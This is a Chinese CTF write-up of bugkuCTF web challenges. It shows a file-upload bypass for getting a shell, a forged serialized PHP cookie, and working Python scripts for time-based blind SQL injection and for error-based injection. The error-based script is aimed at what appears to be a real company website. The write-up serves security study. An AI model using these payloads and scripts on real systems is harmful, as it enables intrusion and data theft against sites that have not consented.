bugkuCTF Writeup (Web)36-40

求getshell

bugkuCTF Writeup (Web)36-40_第1张图片
文件上传绕过
上传一个php文件
用burp抓包
头部的Content-Type改成Multipart/form-data大小写绕过
请求内容里的Content-Type改成image
文件名改成php5
就绕过了
bugkuCTF Writeup (Web)36-40_第2张图片
不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-data的表单提交php是如何处理的,准备去看看RFC文档


flag.php

bugkuCTF Writeup (Web)36-40_第3张图片
根据提示给一个get参数hint就获得了php源码(不懂这有什么意义)

 
error_reporting(0); 
include_once("flag.php"); 
$cookie = $_COOKIE['ISecer']; 
if(isset($_GET['hint'])){ 
    show_source(__FILE__); 
} 
elseif (unserialize($cookie) === "$KEY") 
{    
    echo "$flag"; 
} 
else { 
?> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Logintitle> 
<link rel="stylesheet" href="admin.css" type="text/css"> 
head> 
<body> 
<br> 
<div class="container" align="center"> 
  <form method="POST" action="#"> 
    <p><input name="user" type="text" placeholder="Username">p> 
    <p><input name="password" type="password" placeholder="Password">p> 
    <p><input value="Login" type="button"/>p> 
  form> 
div> 
body> 
html> 

 
} 
$KEY='ISecer:www.isecer.com'; 
?>

伪造一个cookie就可以绕过,只不过这里由于$KEY在后面才声明所以判断的时候并没有定义,所以是设置的cookie应该对应一个空字符串
给出cookie:ISecer=s:0:"";
得到flag
bugkuCTF Writeup (Web)36-40_第4张图片


web15

bugkuCTF Writeup (Web)36-40_第5张图片
一看代码

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

是insert型的sql注入,又关闭了错误显示,那只能时间盲注了
写python脚本盲注:(注意payload中不能出现, 否则会被截断
看数据库:

import requests
import string

characters = string.ascii_letters + string.digits + string.punctuation
max_length = 50
tpl = "'+(select case when (substring((select database() ) from {0} for 1)='{1}') " \
      "then sleep(2) else 1 end) and '1'='1"
url = "http://120.24.86.145:8002/web15/"
flag = ""
for pos in range(1, max_length):
    next_position = False
    for char in characters:
        payload = tpl.format(str(pos), char)
        header = {
            "X-Forwarded-For": payload
        }
        try:
            r = requests.get(url, headers=header, timeout=2)
        except requests.exceptions.ReadTimeout:
            flag += char
            print(flag)
            next_position = True
            break
    if not next_position:
        break

bugkuCTF Writeup (Web)36-40_第6张图片

看第一个table
payload:

tpl = "'+(select case when (substring((" \
      "select table_name from information_schema.tables where table_schema='web15' limit 1) " \
      "from {0} for 1)='{1}') " \
      "then sleep(2) else 1 end) and '1'='1"

bugkuCTF Writeup (Web)36-40_第7张图片

获取第二个table
payload:

tpl = "'+(select case when (substring((" \
      "select table_name from information_schema.tables where table_schema='web15' limit 1 offset 1) " \
      "from {0} for 1)='{1}') " \
      "then sleep(2) else 1 end) and '1'='1"`

bugkuCTF Writeup (Web)36-40_第8张图片

看flag表的列
payload:

tpl = "'+(select case when (substring((" \
      "select column_name from information_schema.columns where table_name='flag' limit 1 ) " \
      "from {0} for 1)='{1}') " \
      "then sleep(2) else 1 end) and '1'='1"

bugkuCTF Writeup (Web)36-40_第9张图片
flag就在这里,flag表的flag字段
于是获取flag
payload:

tpl = "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') " \
      "then sleep(2) else 1 end) and '1'='1"

bugkuCTF Writeup (Web)36-40_第10张图片


文件包含2

bugkuCTF Writeup (Web)36-40_第11张图片
这道题又进不去了


实战2-注入

bugkuCTF Writeup (Web)36-40_第12张图片
打开来是一个网站
bugkuCTF Writeup (Web)36-40_第13张图片
页面一个一个查看,发现在新闻那里会有一个php文件readnews.php传入get参数id
试了一下加了引号看见了sql报错
于是报错注入
看数据库名payload:http://www.kabelindo.co.id/readnews.php?id=1 and (updatexml(0x3a,concat(1,(select database())),1))
提示说flag是最后一个表的名字,估计表可能比较多,于是写了一个脚本爆所有的数据表名
python3:

import requests
import re

url = "http://www.kabelindo.co.id/readnews.php"
payload = "1 and (updatexml(0x3a,concat(1,(select table_name from information_schema.tables" \
          " where table_schema='u9897uwx_kabel' limit {0},1)),1))"
for i in range(1000):
    r = requests.get(url + "?id=" + payload.format(str(i)))
    search = re.search("XPATH syntax error: '(.*)'", r.text, re.S | re.M)
    try:
        print(search.group(1))
    except AttributeError:
        break

bugkuCTF Writeup (Web)36-40_第14张图片
flag:flag{tbnomax}

你可能感兴趣的:(CTF)